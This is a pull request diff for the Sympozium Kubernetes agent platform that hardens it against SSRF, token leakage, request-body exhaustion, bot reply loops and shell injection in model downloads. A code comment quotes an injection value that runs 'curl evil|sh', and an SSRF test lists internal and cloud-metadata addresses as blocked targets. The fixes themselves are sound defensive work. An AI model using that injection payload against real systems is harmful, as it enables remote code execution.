### PR TITLE
Hardening: security, reliability, and correctness fixes from full-codebase review

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -291,12 +291,12 @@ serve-api-ui: web-build build-apiserver ## Run the API server with embedded UI (
 
 run-controller: build-controller ## Run the controller manager locally against the current kubeconfig cluster
 	@echo "==> Scaling down in-cluster controller so local one takes over..."
-	@kubectl scale deploy/sympozium-controller -n $(SYMPOZIUM_NAMESPACE) --replicas=0 2>/dev/null || true
+	@kubectl scale deploy/sympozium-controller-manager -n $(SYMPOZIUM_NAMESPACE) --replicas=0 2>/dev/null || true
 	@echo "==> Starting local controller manager (metrics :9090, health :9091)"
 	@cleanup() { \
 		echo ""; \
 		echo "==> Restoring in-cluster controller..."; \
-		kubectl scale deploy/sympozium-controller -n $(SYMPOZIUM_NAMESPACE) --replicas=1 2>/dev/null || true; \
+		kubectl scale deploy/sympozium-controller-manager -n $(SYMPOZIUM_NAMESPACE) --replicas=1 2>/dev/null || true; \
 		echo "==> Done."; \
 	}; \
 	trap cleanup EXIT INT TERM; \
@@ -326,12 +326,12 @@ dev-all: ## Start everything locally: controller, API server, Vite, and NATS por
 	@kubectl scale deploy/nats -n $(SYMPOZIUM_NAMESPACE) --replicas=1 2>/dev/null || true
 	@kubectl rollout status deploy/nats -n $(SYMPOZIUM_NAMESPACE) --timeout=60s 2>/dev/null || true
 	@echo "==> Scaling down in-cluster controller and apiserver..."
-	@kubectl scale deploy/sympozium-controller -n $(SYMPOZIUM_NAMESPACE) --replicas=0 2>/dev/null || true
+	@kubectl scale deploy/sympozium-controller-manager -n $(SYMPOZIUM_NAMESPACE) --replicas=0 2>/dev/null || true
 	@kubectl scale deploy/sympozium-apiserver -n $(SYMPOZIUM_NAMESPACE) --replicas=0 2>/dev/null || true
 	@cleanup() { \
 		echo ""; \
 		echo "==> Restoring in-cluster deployments..."; \
-		kubectl scale deploy/sympozium-controller -n $(SYMPOZIUM_NAMESPACE) --replicas=1 2>/dev/null || true; \
+		kubectl scale deploy/sympozium-controller-manager -n $(SYMPOZIUM_NAMESPACE) --replicas=1 2>/dev/null || true; \
 		kubectl scale deploy/sympozium-apiserver -n $(SYMPOZIUM_NAMESPACE) --replicas=1 2>/dev/null || true; \
 		echo "==> Done."; \
 	}; \
@@ -385,6 +385,7 @@ install: manifests ## Install Sympozium via Helm chart (CRDs, control plane, bui
 	kubectl apply --server-side --force-conflicts -f $(GATEWAY_API_CRDS_URL)
 	helm upgrade --install sympozium charts/sympozium/ \
 		--namespace sympozium-system --create-namespace \
+		--set createNamespace=false \
 		--set image.tag=$(TAG) \
 		--set certManager.enabled=false \
 		--set webhook.enabled=false \

--- a/README.md
+++ b/README.md
@@ -165,4 +165,4 @@ make run         # run controller locally (needs kubeconfig)
 
 ## License
 
-Apache License 2.0
+MIT License

--- a/api/v1alpha1/agentrun_types.go
+++ b/api/v1alpha1/agentrun_types.go
@@ -483,7 +483,7 @@ type LifecycleHooks struct {
 
 // +kubebuilder:object:root=true
 // +kubebuilder:subresource:status
-// +kubebuilder:printcolumn:name="Instance",type="string",JSONPath=".spec.instanceRef"
+// +kubebuilder:printcolumn:name="Agent",type="string",JSONPath=".spec.agentRef"
 // +kubebuilder:printcolumn:name="Phase",type="string",JSONPath=".status.phase"
 // +kubebuilder:printcolumn:name="Pod",type="string",JSONPath=".status.podName"
 // +kubebuilder:printcolumn:name="Age",type="date",JSONPath=".metadata.creationTimestamp"

--- a/api/v1alpha1/sympoziumschedule_types.go
+++ b/api/v1alpha1/sympoziumschedule_types.go
@@ -64,7 +64,7 @@ type SympoziumScheduleStatus struct {
 
 // +kubebuilder:object:root=true
 // +kubebuilder:subresource:status
-// +kubebuilder:printcolumn:name="Instance",type="string",JSONPath=".spec.instanceRef"
+// +kubebuilder:printcolumn:name="Agent",type="string",JSONPath=".spec.agentRef"
 // +kubebuilder:printcolumn:name="Schedule",type="string",JSONPath=".spec.schedule"
 // +kubebuilder:printcolumn:name="Type",type="string",JSONPath=".spec.type"
 // +kubebuilder:printcolumn:name="Phase",type="string",JSONPath=".status.phase"

--- a/channels/discord/main.go
+++ b/channels/discord/main.go
@@ -122,8 +122,10 @@ func main() {
 
 // messageCreate is the discordgo handler for MESSAGE_CREATE events.
 func (dc *DiscordChannel) messageCreate(s *discordgo.Session, m *discordgo.MessageCreate) {
-	// Ignore messages from the bot itself
-	if m.Author.ID == s.State.User.ID {
+	// Ignore messages from the bot itself, and from any other bot or webhook.
+	// Without the bot/webhook filter, two bots sharing a channel ping-pong
+	// replies forever, burning LLM spend.
+	if m.Author == nil || m.Author.ID == s.State.User.ID || m.Author.Bot || m.WebhookID != "" {
 		return
 	}
 

--- a/channels/telegram/main.go
+++ b/channels/telegram/main.go
@@ -85,6 +85,16 @@ func main() {
 	}
 }
 
+// redactToken replaces the bot token wherever it appears in a string (e.g. a
+// url.Error that embeds the full request URL) so it never reaches logs or the
+// health event bus.
+func (tc *TelegramChannel) redactToken(s string) string {
+	if tc.BotToken == "" {
+		return s
+	}
+	return strings.ReplaceAll(s, tc.BotToken, "***REDACTED***")
+}
+
 // pollUpdates uses Telegram's long-polling getUpdates API.
 func (tc *TelegramChannel) pollUpdates(ctx context.Context) error {
 	offset := 0
@@ -107,7 +117,10 @@ func (tc *TelegramChannel) pollUpdates(ctx context.Context) error {
 		resp, err := tc.client.Do(req)
 		if err != nil {
 			tc.healthy = false
-			_ = tc.PublishHealth(ctx, channel.HealthStatus{Connected: false, Message: err.Error()})
+			// Redact the bot token: a *url.Error stringifies to the full request
+			// URL, which embeds the token, and this message is published to the
+			// health topic (24h retention) and logs.
+			_ = tc.PublishHealth(ctx, channel.HealthStatus{Connected: false, Message: tc.redactToken(err.Error())})
 			time.Sleep(5 * time.Second)
 			continue
 		}
@@ -132,11 +145,23 @@ func (tc *TelegramChannel) pollUpdates(ctx context.Context) error {
 			} `json:"result"`
 		}
 
-		if err := json.NewDecoder(resp.Body).Decode(&result); err != nil {
-			resp.Body.Close()
+		statusCode := resp.StatusCode
+		decodeErr := json.NewDecoder(resp.Body).Decode(&result)
+		resp.Body.Close()
+
+		// Back off on transport/API errors instead of hammering Telegram in a
+		// tight loop. A revoked token (401) or a conflicting poller/webhook (409)
+		// otherwise spins here forever while still reporting healthy.
+		if decodeErr != nil || statusCode != http.StatusOK || !result.OK {
+			tc.healthy = false
+			msg := fmt.Sprintf("telegram getUpdates failed: status=%d ok=%t", statusCode, result.OK)
+			if decodeErr != nil {
+				msg = tc.redactToken(fmt.Sprintf("telegram getUpdates decode error: %v", decodeErr))
+			}
+			_ = tc.PublishHealth(ctx, channel.HealthStatus{Connected: false, Message: msg})
+			time.Sleep(5 * time.Second)
 			continue
 		}
-		resp.Body.Close()
 
 		tc.healthy = true
 

--- a/channels/telegram/main_test.go
+++ b/channels/telegram/main_test.go
@@ -1,0 +1,32 @@
+package main
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestRedactToken(t *testing.T) {
+	tc := &TelegramChannel{BotToken: "123456:ABC-secret-token"}
+
+	// A url.Error-style string embeds the full request URL including the token.
+	in := `Get "https://api.telegram.org/bot123456:ABC-secret-token/getUpdates?offset=0": dial tcp: timeout`
+	out := tc.redactToken(in)
+
+	if strings.Contains(out, "123456:ABC-secret-token") {
+		t.Errorf("redactToken left the bot token in the string: %q", out)
+	}
+	if !strings.Contains(out, "***REDACTED***") {
+		t.Errorf("redactToken did not insert the redaction marker: %q", out)
+	}
+	if !strings.Contains(out, "dial tcp: timeout") {
+		t.Errorf("redactToken removed non-secret content: %q", out)
+	}
+}
+
+func TestRedactTokenEmpty(t *testing.T) {
+	tc := &TelegramChannel{BotToken: ""}
+	in := "some error"
+	if got := tc.redactToken(in); got != in {
+		t.Errorf("redactToken with empty token = %q, want unchanged %q", got, in)
+	}
+}

--- a/charts/sympozium-crds/templates/sympozium.ai_agentruns.yaml
+++ b/charts/sympozium-crds/templates/sympozium.ai_agentruns.yaml
@@ -15,8 +15,8 @@ spec:
   scope: Namespaced
   versions:
   - additionalPrinterColumns:
-    - jsonPath: .spec.instanceRef
-      name: Instance
+    - jsonPath: .spec.agentRef
+      name: Agent
       type: string
     - jsonPath: .status.phase
       name: Phase

--- a/charts/sympozium-crds/templates/sympozium.ai_sympoziumschedules.yaml
+++ b/charts/sympozium-crds/templates/sympozium.ai_sympoziumschedules.yaml
@@ -15,8 +15,8 @@ spec:
   scope: Namespaced
   versions:
   - additionalPrinterColumns:
-    - jsonPath: .spec.instanceRef
-      name: Instance
+    - jsonPath: .spec.agentRef
+      name: Agent
       type: string
     - jsonPath: .spec.schedule
       name: Schedule

--- a/charts/sympozium/crds/sympozium.ai_agentruns.yaml
+++ b/charts/sympozium/crds/sympozium.ai_agentruns.yaml
@@ -15,8 +15,8 @@ spec:
   scope: Namespaced
   versions:
   - additionalPrinterColumns:
-    - jsonPath: .spec.instanceRef
-      name: Instance
+    - jsonPath: .spec.agentRef
+      name: Agent
       type: string
     - jsonPath: .status.phase
       name: Phase

--- a/charts/sympozium/crds/sympozium.ai_sympoziumschedules.yaml
+++ b/charts/sympozium/crds/sympozium.ai_sympoziumschedules.yaml
@@ -15,8 +15,8 @@ spec:
   scope: Namespaced
   versions:
   - additionalPrinterColumns:
-    - jsonPath: .spec.instanceRef
-      name: Instance
+    - jsonPath: .spec.agentRef
+      name: Agent
       type: string
     - jsonPath: .spec.schedule
       name: Schedule

--- a/charts/sympozium/templates/models.yaml
+++ b/charts/sympozium/templates/models.yaml
@@ -24,7 +24,9 @@ spec:
     storageClass: {{ .storageClass | quote }}
     {{- end }}
   resources:
-    gpu: {{ .gpu | default 1 }}
+    {{- /* Use hasKey so an explicit gpu: 0 (CPU-only) is honoured; Sprig's
+           `default` treats 0 as empty and would silently coerce it to 1. */}}
+    gpu: {{ if hasKey . "gpu" }}{{ .gpu }}{{ else }}1{{ end }}
     memory: {{ .memory | default "16Gi" | quote }}
     cpu: {{ .cpu | default "4" | quote }}
   inference:

--- a/cmd/agent-runner/ssrf_test.go
+++ b/cmd/agent-runner/ssrf_test.go
@@ -1,0 +1,50 @@
+package main
+
+import (
+	"context"
+	"strings"
+	"testing"
+)
+
+// TestSSRFGuardedDialContext_BlocksInternal verifies the fetch_url dial guard
+// rejects loopback/private/link-local targets (IP literals resolve without
+// network I/O, so no real connection is attempted).
+func TestSSRFGuardedDialContext_BlocksInternal(t *testing.T) {
+	t.Setenv("SYMPOZIUM_FETCH_URL_ALLOW_PRIVATE", "")
+	dial := ssrfGuardedDialContext()
+
+	blocked := []string{
+		"127.0.0.1:80",       // loopback v4
+		"[::1]:80",           // loopback v6
+		"10.0.0.5:6443",      // private (kube-apiserver-ish)
+		"192.168.1.1:80",     // private
+		"169.254.169.254:80", // link-local (cloud metadata)
+		"0.0.0.0:80",         // unspecified
+	}
+	for _, addr := range blocked {
+		_, err := dial(context.Background(), "tcp", addr)
+		if err == nil {
+			t.Errorf("dial(%q) succeeded, want rejection", addr)
+			continue
+		}
+		if !strings.Contains(err.Error(), "disallowed") {
+			t.Errorf("dial(%q) error = %q, want a 'disallowed address' rejection", addr, err.Error())
+		}
+	}
+}
+
+// TestSSRFGuardedDialContext_OptOut verifies the escape hatch returns a plain
+// dialer (no address filtering) when explicitly enabled.
+func TestSSRFGuardedDialContext_OptOut(t *testing.T) {
+	t.Setenv("SYMPOZIUM_FETCH_URL_ALLOW_PRIVATE", "true")
+	dial := ssrfGuardedDialContext()
+
+	// With the guard disabled, dialing loopback should not be rejected on
+	// address grounds; it will fail only if nothing is listening. Use a port
+	// that is almost certainly closed and assert the error, if any, is not our
+	// "disallowed" rejection.
+	_, err := dial(context.Background(), "tcp", "127.0.0.1:9")
+	if err != nil && strings.Contains(err.Error(), "disallowed") {
+		t.Errorf("opt-out dialer still rejected loopback as disallowed: %v", err)
+	}
+}

--- a/cmd/agent-runner/tools.go
+++ b/cmd/agent-runner/tools.go
@@ -6,6 +6,7 @@ import (
 	"fmt"
 	"io"
 	"log"
+	"net"
 	"net/http"
 	"os"
 	"path/filepath"
@@ -17,6 +18,41 @@ import (
 	"github.com/sympozium-ai/sympozium/pkg/sidecartools"
 	"golang.org/x/net/html"
 )
+
+// ssrfGuardedDialContext returns a DialContext that rejects connections to
+// loopback, link-local, private, and unspecified addresses. It is checked
+// against the resolved IP at dial time, so it also defeats DNS-rebinding that
+// would slip past a resolve-then-connect check. Agents are treated as
+// adversarial (prompt injection), so fetch_url must not become an SSRF pivot
+// into the node metadata service, NATS, or the Kubernetes API. Operators who
+// genuinely need agents to reach cluster-internal hosts can opt out by setting
+// SYMPOZIUM_FETCH_URL_ALLOW_PRIVATE=true.
+func ssrfGuardedDialContext() func(ctx context.Context, network, addr string) (net.Conn, error) {
+	if strings.EqualFold(os.Getenv("SYMPOZIUM_FETCH_URL_ALLOW_PRIVATE"), "true") {
+		return (&net.Dialer{Timeout: 30 * time.Second}).DialContext
+	}
+	dialer := &net.Dialer{Timeout: 30 * time.Second}
+	return func(ctx context.Context, network, addr string) (net.Conn, error) {
+		host, port, err := net.SplitHostPort(addr)
+		if err != nil {
+			return nil, err
+		}
+		ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
+		if err != nil {
+			return nil, err
+		}
+		for _, ipAddr := range ips {
+			ip := ipAddr.IP
+			if ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
+				ip.IsPrivate() || ip.IsUnspecified() {
+				return nil, fmt.Errorf("refusing to connect to disallowed address %s", ip)
+			}
+		}
+		// Dial the vetted IP directly so a rebind between resolve and connect
+		// cannot substitute a blocked address.
+		return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))
+	}
+}
 
 // Tool name constants.
 const (
@@ -693,6 +729,9 @@ func fetchURLTool(args map[string]any) string {
 
 	client := &http.Client{
 		Timeout: 30 * time.Second,
+		Transport: &http.Transport{
+			DialContext: ssrfGuardedDialContext(),
+		},
 		CheckRedirect: func(req *http.Request, via []*http.Request) error {
 			if len(via) >= 5 {
 				return fmt.Errorf("too many redirects")

--- a/cmd/memory-server/main.go
+++ b/cmd/memory-server/main.go
@@ -216,7 +216,18 @@ func main() {
 	// are named by route (e.g. "memory POST /store"); /health is left
 	// uninstrumented to avoid probe noise. No-op when OTel is disabled — the
 	// global TracerProvider is then a noop and spans are dropped cheaply.
-	handler := otelhttp.NewHandler(mux, "memory-server",
+	// Cap request bodies so a single caller cannot exhaust the backing
+	// PersistentVolume (or the process's memory) with an oversized /store
+	// payload. 4 MiB comfortably exceeds any legitimate memory entry.
+	const maxBodyBytes = 4 << 20
+	bodyLimited := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Body != nil {
+			r.Body = http.MaxBytesReader(w, r.Body, maxBodyBytes)
+		}
+		mux.ServeHTTP(w, r)
+	})
+
+	handler := otelhttp.NewHandler(bodyLimited, "memory-server",
 		otelhttp.WithSpanNameFormatter(func(_ string, r *http.Request) string {
 			return "memory " + r.Method + " " + r.URL.Path
 		}),

--- a/cmd/node-probe/interval_test.go
+++ b/cmd/node-probe/interval_test.go
@@ -1,0 +1,38 @@
+package main
+
+import (
+	"testing"
+	"time"
+)
+
+func TestResolveProbeInterval(t *testing.T) {
+	cases := []struct {
+		name         string
+		raw          string
+		want         time.Duration
+		wantFellBack bool
+	}{
+		{"valid", "45s", 45 * time.Second, false},
+		{"valid minutes", "2m", 2 * time.Minute, false},
+		{"zero falls back", "0s", 30 * time.Second, true},
+		{"negative falls back", "-5s", 30 * time.Second, true},
+		{"garbage falls back", "not-a-duration", 30 * time.Second, true},
+		{"empty falls back", "", 30 * time.Second, true},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			got, reason := resolveProbeInterval(tc.raw)
+			if got != tc.want {
+				t.Errorf("resolveProbeInterval(%q) = %v, want %v", tc.raw, got, tc.want)
+			}
+			if (reason != "") != tc.wantFellBack {
+				t.Errorf("resolveProbeInterval(%q) reason=%q, wantFellBack=%v", tc.raw, reason, tc.wantFellBack)
+			}
+			// The returned duration must always be positive so time.NewTicker
+			// never panics.
+			if got <= 0 {
+				t.Errorf("resolveProbeInterval(%q) returned non-positive %v", tc.raw, got)
+			}
+		})
+	}
+}

--- a/cmd/node-probe/main.go
+++ b/cmd/node-probe/main.go
@@ -125,9 +125,9 @@ func main() {
 		os.Exit(1)
 	}
 
-	interval, err := time.ParseDuration(cfg.ProbeInterval)
-	if err != nil {
-		interval = 30 * time.Second
+	interval, reason := resolveProbeInterval(cfg.ProbeInterval)
+	if reason != "" {
+		log.Info(reason, "value", cfg.ProbeInterval)
 	}
 
 	restCfg, err := rest.InClusterConfig()
@@ -165,6 +165,22 @@ func main() {
 
 	// Run the first probe immediately.
 	runProbeLoop(ctx, clientset, nodeName, cfg.Targets, interval, registry)
+}
+
+// resolveProbeInterval parses the configured probe interval, falling back to
+// 30s when it is unparseable or non-positive. A non-positive duration would
+// otherwise panic time.NewTicker and crash-loop the DaemonSet. The returned
+// reason is empty when the configured value was used as-is.
+func resolveProbeInterval(raw string) (time.Duration, string) {
+	const fallback = 30 * time.Second
+	d, err := time.ParseDuration(raw)
+	if err != nil {
+		return fallback, "invalid probeInterval, using default"
+	}
+	if d <= 0 {
+		return fallback, "non-positive probeInterval, using default"
+	}
+	return d, ""
 }
 
 func loadConfig(path string) (*ProbeConfig, error) {

--- a/cmd/sympozium/main.go
+++ b/cmd/sympozium/main.go
@@ -6202,6 +6202,24 @@ func (m tuiModel) View() string {
 		}
 	}
 
+	// Derive the vertical scroll offset from the current selection so the
+	// highlighted row is always within the visible window. Every table renderer
+	// draws tableH-1 rows starting at m.tableScroll; without this, tableScroll
+	// stayed pinned at 0 and any selection past the first screenful became
+	// invisible and unreachable.
+	visibleRows := tableH - 1
+	if visibleRows < 1 {
+		visibleRows = 1
+	}
+	if m.selectedRow < m.tableScroll {
+		m.tableScroll = m.selectedRow
+	} else if m.selectedRow >= m.tableScroll+visibleRows {
+		m.tableScroll = m.selectedRow - visibleRows + 1
+	}
+	if m.tableScroll < 0 {
+		m.tableScroll = 0
+	}
+
 	var view strings.Builder
 
 	// 1. Header bar

--- a/config/crd/bases/sympozium.ai_agentruns.yaml
+++ b/config/crd/bases/sympozium.ai_agentruns.yaml
@@ -15,8 +15,8 @@ spec:
   scope: Namespaced
   versions:
   - additionalPrinterColumns:
-    - jsonPath: .spec.instanceRef
-      name: Instance
+    - jsonPath: .spec.agentRef
+      name: Agent
       type: string
     - jsonPath: .status.phase
       name: Phase

--- a/config/crd/bases/sympozium.ai_sympoziumschedules.yaml
+++ b/config/crd/bases/sympozium.ai_sympoziumschedules.yaml
@@ -15,8 +15,8 @@ spec:
   scope: Namespaced
   versions:
   - additionalPrinterColumns:
-    - jsonPath: .spec.instanceRef
-      name: Instance
+    - jsonPath: .spec.agentRef
+      name: Agent
       type: string
     - jsonPath: .spec.schedule
       name: Schedule

--- a/docs/getting-started.md
+++ b/docs/getting-started.md
@@ -25,7 +25,7 @@ brew install sympozium-ai/sympozium/sympozium
 ### Shell installer
 
 ```bash
-curl -fsSL https://sympozium.com/install.sh | sh
+curl -fsSL https://deploy.sympozium.ai/install.sh | sh
 ```
 
 ### From source
@@ -567,7 +567,7 @@ spec:
   description: "Custom agents for my team"
   category: custom
   version: "1.0.0"
-  personas:
+  agentConfigs:
     - name: log-analyzer
       displayName: "Log Analyzer"
       systemPrompt: |

--- a/docs/guides/serving-mode.md
+++ b/docs/guides/serving-mode.md
@@ -144,7 +144,7 @@ This port-forwards the in-cluster API server to your local machine and opens the
 
 | Flag | Default | Description |
 |------|---------|-------------|
-| `--port` | `8080` | Local port to forward to |
+| `--port` | `9090` | Local port to forward to |
 | `--open` | `false` | Automatically open a browser |
 | `--service-namespace` | `sympozium-system` | Namespace of the apiserver service |
 

--- a/docs/index.md
+++ b/docs/index.md
@@ -91,4 +91,4 @@ Every concept that traditional agent frameworks manage in application code, Symp
 
 - [GitHub Repository](https://github.com/sympozium-ai/sympozium)
 - [Releases](https://github.com/sympozium-ai/sympozium/releases)
-- [License](https://github.com/sympozium-ai/sympozium/blob/main/LICENSE) — Apache 2.0
+- [License](https://github.com/sympozium-ai/sympozium/blob/main/LICENSE) — MIT

--- a/docs/reference/cli.md
+++ b/docs/reference/cli.md
@@ -26,7 +26,7 @@ sympozium serve                          # open the web dashboard in your browse
 
 | Flag | Default | Description |
 |------|---------|-------------|
-| `--port` | `8080` | Local port to forward to |
+| `--port` | `9090` | Local port to forward to |
 | `--open` | `false` | Automatically open a browser |
 | `--service-namespace` | `sympozium-system` | Namespace of the apiserver service |
 

--- a/examples/SETUP.md
+++ b/examples/SETUP.md
@@ -9,7 +9,7 @@ Before applying any examples, you need to set up prerequisites.
 brew install sympozium-ai/sympozium/sympozium
 
 # OR via shell installer
-curl -fsSL https://sympozium.com/install.sh | sh
+curl -fsSL https://deploy.sympozium.ai/install.sh | sh
 
 # Verify install
 sympozium version

--- a/internal/apiserver/server.go
+++ b/internal/apiserver/server.go
@@ -4,6 +4,7 @@ package apiserver
 import (
 	"bufio"
 	"context"
+	"crypto/subtle"
 	"encoding/json"
 	"fmt"
 	"io"
@@ -283,7 +284,7 @@ func authMiddleware(expectedToken string, next http.Handler) http.Handler {
 		if token == "" {
 			token = r.URL.Query().Get("token")
 		}
-		if token != expectedToken {
+		if subtle.ConstantTimeCompare([]byte(token), []byte(expectedToken)) != 1 {
 			http.Error(w, "Unauthorized", http.StatusUnauthorized)
 			return
 		}
@@ -3739,8 +3740,13 @@ func (s *Server) proxyProviderModels(w http.ResponseWriter, r *http.Request) {
 		if ip == nil {
 			continue
 		}
-		// Block link-local (metadata endpoints).
-		if ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() {
+		// Block SSRF targets: link-local (cloud metadata), loopback, private,
+		// and unspecified ranges — otherwise this handler can be steered at the
+		// kube-apiserver or any in-cluster service. This is a best-effort check;
+		// a DNS-rebinding name can still change between resolution here and the
+		// client's own re-resolution below.
+		if ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
+			ip.IsLoopback() || ip.IsPrivate() || ip.IsUnspecified() {
 			http.Error(w, "baseURL resolves to a disallowed address", http.StatusForbidden)
 			return
 		}

--- a/internal/controller/agentrun_controller.go
+++ b/internal/controller/agentrun_controller.go
@@ -88,6 +88,11 @@ var (
 const agentRunFinalizer = "sympozium.ai/agentrun-finalizer"
 const systemNamespace = "sympozium-system"
 
+// tokenBudgetCountedAnnotation marks an AgentRun whose token usage has already
+// been aggregated into its ensemble's budget, so repeated reconciles of the
+// completed run cannot double-count it.
+const tokenBudgetCountedAnnotation = "sympozium.ai/token-budget-counted"
+
 // allowedAuthSecretKeys lists the only Secret keys that will be injected from
 // an auth secret into the agent container. This prevents wholesale secret
 // leakage when a secret contains extra keys.
@@ -3007,6 +3012,14 @@ func (r *AgentRunReconciler) updateTokenBudget(ctx context.Context, log logr.Log
 		return nil
 	}
 
+	// Idempotency guard: reconcileCompleted runs multiple times per completed
+	// run (finalizer removal and successor-label patches each re-trigger it), so
+	// without this marker the same run's tokens would be added to the ensemble
+	// budget 2-3 times, tripping a `halt` budget far too early.
+	if agentRun.Annotations[tokenBudgetCountedAnnotation] == "true" {
+		return nil
+	}
+
 	var pack sympoziumv1alpha1.Ensemble
 	if err := r.Get(ctx, types.NamespacedName{Name: packName, Namespace: agentRun.Namespace}, &pack); err != nil {
 		return nil
@@ -3014,6 +3027,18 @@ func (r *AgentRunReconciler) updateTokenBudget(ctx context.Context, log logr.Log
 	if pack.Spec.SharedMemory == nil || pack.Spec.SharedMemory.Membrane == nil ||
 		pack.Spec.SharedMemory.Membrane.TokenBudget == nil {
 		return nil
+	}
+
+	// Persist the guard annotation before mutating the shared budget. If the
+	// budget patch below fails we prefer a one-time under-count on retry over
+	// the systematic over-count that dropping the guard would cause.
+	runPatch := client.MergeFrom(agentRun.DeepCopy())
+	if agentRun.Annotations == nil {
+		agentRun.Annotations = map[string]string{}
+	}
+	agentRun.Annotations[tokenBudgetCountedAnnotation] = "true"
+	if err := r.Patch(ctx, agentRun, runPatch); err != nil {
+		return fmt.Errorf("marking run token-budget-counted: %w", err)
 	}
 
 	patch := client.MergeFrom(pack.DeepCopy())
@@ -3729,6 +3754,9 @@ func (r *AgentRunReconciler) extractAndPersistMemory(ctx context.Context, log lo
 		return
 	}
 
+	if cm.Data == nil {
+		cm.Data = map[string]string{}
+	}
 	cm.Data["MEMORY.md"] = memoryContent
 	if err := r.Update(ctx, &cm); err != nil {
 		log.V(1).Info("failed to update memory ConfigMap", "err", err)

--- a/internal/controller/agentrun_controller_test.go
+++ b/internal/controller/agentrun_controller_test.go
@@ -2296,7 +2296,9 @@ func TestUpdateTokenBudget(t *testing.T) {
 		TotalTokens: 1500,
 	}
 
-	r := newMembraneTestReconciler(t, pack)
+	// Register the run too: updateTokenBudget now stamps an idempotency guard
+	// annotation on it, which requires the run to exist in the client.
+	r := newMembraneTestReconciler(t, pack, run)
 	err := r.updateTokenBudget(context.Background(), logr.Discard(), run)
 	if err != nil {
 		t.Fatalf("updateTokenBudget: %v", err)
@@ -2309,6 +2311,22 @@ func TestUpdateTokenBudget(t *testing.T) {
 	}
 	if updated.Status.TokenBudgetUsed != 1500 {
 		t.Errorf("tokenBudgetUsed = %d, want 1500", updated.Status.TokenBudgetUsed)
+	}
+
+	// Idempotency: re-running on the same (now guard-annotated) run must not
+	// double-count the tokens into the ensemble budget.
+	var afterFirst sympoziumv1alpha1.AgentRun
+	if err := r.Get(context.Background(), types.NamespacedName{Name: run.Name, Namespace: run.Namespace}, &afterFirst); err != nil {
+		t.Fatalf("get run: %v", err)
+	}
+	if err := r.updateTokenBudget(context.Background(), logr.Discard(), &afterFirst); err != nil {
+		t.Fatalf("updateTokenBudget (second call): %v", err)
+	}
+	if err := r.Get(context.Background(), types.NamespacedName{Name: "my-pack", Namespace: "default"}, &updated); err != nil {
+		t.Fatalf("get ensemble: %v", err)
+	}
+	if updated.Status.TokenBudgetUsed != 1500 {
+		t.Errorf("after second call tokenBudgetUsed = %d, want 1500 (no double-count)", updated.Status.TokenBudgetUsed)
 	}
 }
 

--- a/internal/controller/model_controller.go
+++ b/internal/controller/model_controller.go
@@ -564,7 +564,18 @@ func (r *ModelReconciler) reconcileDownloading(ctx context.Context, model *sympo
 		return ctrl.Result{RequeueAfter: 5 * time.Second}, nil
 	}
 
-	if job.Status.Failed > 0 {
+	// Only treat the download as failed once the Job itself reaches a terminal
+	// Failed condition (BackoffLimit exhausted). Keying off job.Status.Failed > 0
+	// marked the Model permanently Failed on the first transient pod failure,
+	// even though the Job was still retrying and might yet succeed.
+	jobFailed := false
+	for _, c := range job.Status.Conditions {
+		if c.Type == batchv1.JobFailed && c.Status == corev1.ConditionTrue {
+			jobFailed = true
+			break
+		}
+	}
+	if jobFailed {
 		log.Info("Model download failed")
 		model.Status.Phase = sympoziumv1alpha1.ModelPhaseFailed
 		model.Status.Message = "Download job failed"
@@ -779,39 +790,41 @@ func (r *ModelReconciler) ensureDownloadJob(ctx context.Context, model *sympoziu
 	modelPath := filepath.Join(modelMountPath, filename)
 	tempPath := modelPath + ".tmp"
 
-	// Download with atomic rename: download to .tmp then move.
-	// When a SHA256 checksum is provided, verify after download.
+	// Download with atomic rename: download to .tmp then move. The URL,
+	// checksum, and paths are passed to the container as environment variables
+	// and referenced (quoted) from a *static* script, so untrusted Model CR
+	// fields (source.url, source.sha256, filename) can never be interpolated
+	// into the shell command — closing a command-injection sink where e.g.
+	// `url: '"; curl evil|sh; "'` would previously have executed.
 	checksumScript := ""
 	if model.Spec.Source.SHA256 != "" {
-		checksumScript = fmt.Sprintf(`
+		checksumScript = `
 echo "Verifying SHA-256 checksum..."
-ACTUAL=$(sha256sum "%s" | cut -d ' ' -f1)
-EXPECTED="%s"
-if [ "$ACTUAL" != "$EXPECTED" ]; then
-  echo "Checksum mismatch: expected $EXPECTED, got $ACTUAL"
-  rm -f "%s"
+ACTUAL=$(sha256sum "$MODEL_TMP_PATH" | cut -d ' ' -f1)
+if [ "$ACTUAL" != "$MODEL_SHA256" ]; then
+  echo "Checksum mismatch: expected $MODEL_SHA256, got $ACTUAL"
+  rm -f "$MODEL_TMP_PATH"
   exit 1
 fi
-echo "Checksum verified"`,
-			tempPath, model.Spec.Source.SHA256, tempPath,
-		)
+echo "Checksum verified"`
 	}
 
-	downloadScript := fmt.Sprintf(`set -e
-if [ -f "%s" ]; then
+	downloadScript := `set -e
+if [ -f "$MODEL_PATH" ]; then
   echo "Model file already exists, skipping download"
   exit 0
 fi
-echo "Downloading model from %s"
-curl -L --fail --retry 3 --retry-delay 5 -o "%s" "%s"%s
-mv "%s" "%s"
-echo "Download complete"`,
-		modelPath,
-		model.Spec.Source.URL,
-		tempPath, model.Spec.Source.URL,
-		checksumScript,
-		tempPath, modelPath,
-	)
+echo "Downloading model from $MODEL_URL"
+curl -L --fail --retry 3 --retry-delay 5 -o "$MODEL_TMP_PATH" "$MODEL_URL"` + checksumScript + `
+mv "$MODEL_TMP_PATH" "$MODEL_PATH"
+echo "Download complete"`
+
+	downloadEnv := []corev1.EnvVar{
+		{Name: "MODEL_URL", Value: model.Spec.Source.URL},
+		{Name: "MODEL_SHA256", Value: model.Spec.Source.SHA256},
+		{Name: "MODEL_PATH", Value: modelPath},
+		{Name: "MODEL_TMP_PATH", Value: tempPath},
+	}
 
 	backoffLimit := int32(2)
 	ttlSeconds := int32(300)
@@ -833,6 +846,7 @@ echo "Download complete"`,
 							Name:            "download",
 							Image:           downloadJobImage,
 							Command:         []string{"sh", "-c", downloadScript},
+							Env:             downloadEnv,
 							SecurityContext: modelContainerSecurityContext(),
